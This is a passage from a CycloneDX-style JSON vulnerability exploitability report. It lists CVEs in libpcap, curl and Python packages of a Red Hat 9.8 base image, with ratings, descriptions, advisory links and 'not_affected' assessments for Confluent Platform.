          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-11961",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 1.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        122,
        126
      ],
      "description": "pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer.  The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented.  If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11961"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11961"
        },
        {
          "url": "https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11961"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11961"
        }
      ],
      "published": "2025-12-31T01:15:54+00:00",
      "updated": "2026-06-17T08:31:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14",
          "versions": [
            {
              "version": "14:1.10.0-4.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.8&epoch=14"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-12781",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        704
      ],
      "description": "When passing data to the b64decode(), standard_b64decode(), and urlsafe_b64decode() functions in the \"base64\" module the characters \"+/\" will always be accepted, regardless of the value of \"altchars\" parameter, typically used to establish an \"alternative base64 alphabet\" such as the URL safe alphabet. This behavior matches what is recommended in earlier base64 RFCs, but newer RFCs now recommend either dropping characters outside the specified base64 alphabet or raising an error. The old behavior has the possibility of causing data integrity issues.\n\n\n\n\nThis behavior can only be insecure if your application uses an alternate base64 alphabet (without \"+/\"). If your application does not use the \"altchars\" parameter or the urlsafe_b64decode() function, then your application does not use an alternative base64 alphabet.\n\n\n\n\nThe attached patches DOES NOT make the base64-decode behavior raise an error, as this would be a change in behavior and break existing programs. Instead, the patch deprecates the behavior which will be replaced with the newly recommended behavior in a future version of Python.\u00a0Users are recommended to mitigate by verifying user-controlled inputs match the base64 \nalphabet they are expecting or verify that their application would not be \naffected if the b64decode() functions accepted \"+\" or \"/\" outside of altchars.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-12781"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-12781"
        },
        {
          "url": "https://github.com/python/cpython/commit/13360efd385d1a7d0659beba03787ea3d063ef9b"
        },
        {
          "url": "https://github.com/python/cpython/commit/1be80bec7960f5ccd059e75f3dfbd45fca302947"
        },
        {
          "url": "https://github.com/python/cpython/commit/9060b4abbe475591b6230b23c2afefeff26fcca5"
        },
        {
          "url": "https://github.com/python/cpython/commit/e95e783dff443b68e8179fdb57737025bf02ba76"
        },
        {
          "url": "https://github.com/python/cpython/commit/fd17ee026fa9b67f6288cbafe374a3e479fe03a5"
        },
        {
          "url": "https://github.com/python/cpython/issues/125346"
        },
        {
          "url": "https://github.com/python/cpython/pull/141128"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/KRI7GC6S27YV5NJ4FPDALS2WI5ENAFJ6/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12781"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-12781"
        }
      ],
      "published": "2026-01-21T20:16:04+00:00",
      "updated": "2026-06-17T08:32:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13034",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        295
      ],
      "description": "When using `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey`\nwith the curl tool,curl should check the public key of the server certificate\nto verify the peer.\n\nThis check was skipped in a certain condition that would then make curl allow\nthe connection without performing the proper check, thus not noticing a\npossible impostor. To skip this check, the connection had to be done with QUIC\nwith ngtcp2 built to use GnuTLS and the user had to explicitly disable the\nstandard certificate verification.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13034"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13034"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-9r76-qj98-jfhc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13034"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13034"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-06-17T08:33:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13462",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        74,
        434
      ],
      "description": "The \"tarfile\" module would still apply normalization of AREGTYPE (\\x00) blocks to DIRTYPE, even while processing a multi-block member such as GNUTYPE_LONGNAME or GNUTYPE_LONGLINK. This could result in a crafted tar archive being misinterpreted by the tarfile module compared to other implementations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13462"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13462"
        },
        {
          "url": "https://github.com/python/cpython/commit/42d754e34c06e57ad6b8e7f92f32af679912d8ab"
        },
        {
          "url": "https://github.com/python/cpython/commit/72dde1016493c52abe857fc4a7bf6c40138b4114"
        },
        {
